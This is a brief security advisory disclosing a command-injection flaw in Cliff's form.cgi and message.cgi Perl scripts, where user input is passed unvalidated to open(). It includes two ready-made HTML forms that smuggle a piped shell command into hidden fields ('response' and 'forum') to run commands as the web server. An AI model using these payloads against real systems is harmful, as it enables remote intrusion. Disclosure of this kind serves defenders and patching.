suid@suid.kg - mini advisory - Cliff's Form Mailer and Message board CGIs

Software: 	form.cgi and message.cgi 
URL:		http://www.shavenferret.com/scripts/form/
URL:		http://www.shavenferret.com/scripts/message/
Version:	Version 1.0
Platforms:	Unix
Type:		Input validation problem

Summary:

	Anyone can execute any command on the remote system with
	the priveleges of the web server.

Vulnerability:

	The perl code does no input validation and performs an
	open() on a user supplied input.

Exploits:

	(1) form.cgi

	Build a HTML form resembling:

	<form action=/cgi-bin/form.cgi method=post>

		<!-- heres the little sucker -->
		<input type=hidden name=response value="| <cmd to exec>">

		<input type=hidden name=email value="suid@suid.edu">
		<input type=hidden name=name value="name">
 		<input type=hidden name=subject value=x>
 		<input type=submit>
	</form>       

	(2) message.cgi

	<form action=/cgi-bin/message.cgi method=post>
		<input type="hidden" name="name" value="X">
		<input type="hidden" name="email" value="X@X.X">
		<input type="hidden" name="subject" value="X">
		<input type="hidden" name="body" value="X">
		<input type="hidden" name="song" value="">
		<input type="hidden" name="icon" value="X">
		<input type="hidden" name="email_reply" value="no">
		<input type="hidden" name="history" value="">
	<!-- here tis -->
		<input type="hidden" name="forum" 
		value=" | <command goes here> |">
	<!-- hmm -->

		<input type="hidden" name="required" value="0">
		<input type="hidden" name="reply" value="no">
		<input type="hidden" name="action" value="new_message">
		<input type="submit">
	</form>

	Of course you could simply send this in a POST request directly
	to the web server. Whatever.


http://www.suid.edu/advisories/006.txt

EOF